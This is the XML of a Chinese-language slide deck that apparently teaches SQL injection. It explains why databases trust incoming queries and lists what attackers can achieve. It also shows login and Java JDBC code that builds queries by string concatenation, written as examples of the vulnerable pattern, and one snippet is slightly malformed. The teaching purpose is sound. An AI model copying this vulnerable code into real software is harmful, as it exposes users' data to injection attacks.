            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Php</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Java</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asp</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Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>与这些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>进行通讯。对于数据库的操作，目前普遍使用一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>语言（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Structured Query Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>语言，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>语言的功能包括查询、操纵、定义和控制，是一个综合的、通用的关系数据库语言，同时又是一种高度非过程化的语言，只要求用户 指出做什么而不需要指出怎么做），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>作为字符串通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>传入给数据库，数据库将查询的结果返回，数据库自身是无法分辨传入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>是合法的还是不合 法的，它完全信任传入的数据，如果传入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>语句被恶意用户控制或者篡改，将导致数据库以当前调用者的身份执行预期之外的命令并且返回结果，导致安全问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1543464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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞在防护不严谨的情况下，可以执行的权限是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用拥有的数据库账号权限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>恶意用户利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>注入可以做到：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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、可读取数据库中的库和表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>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、可执行系统命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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、可以修改任意文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、可以安装木马后门</a:t>
            </a:r>
          </a:p>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="792900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图片是正常访问网站的方法。最后</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用会根据用户请求的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>去查询数据库，把数据返回给用户。</a:t>
            </a:r>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1298568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r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>登陆过程中，服务端会根据</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求，根据获取的用户名和密码生成两个变量：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>username = "</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bart</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>password = "</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>simpson</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>然后使用这两个变量编写</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"SELECT * FROM users WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t> username = ‘” + username + “’ and password = ‘” + password “’;”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>然后把这个语句传递给数据库服务器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我们更改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>格式，就能直接更改整个数据库结构。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>注入示例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>以下是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JAVA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>注入漏洞的代码示例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Java(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>jdbc</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示例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HttpServletRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> request, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HttpServletResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> response) {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JdbcConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JdbcConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1"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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>final String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = "select * from users where username=‘"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
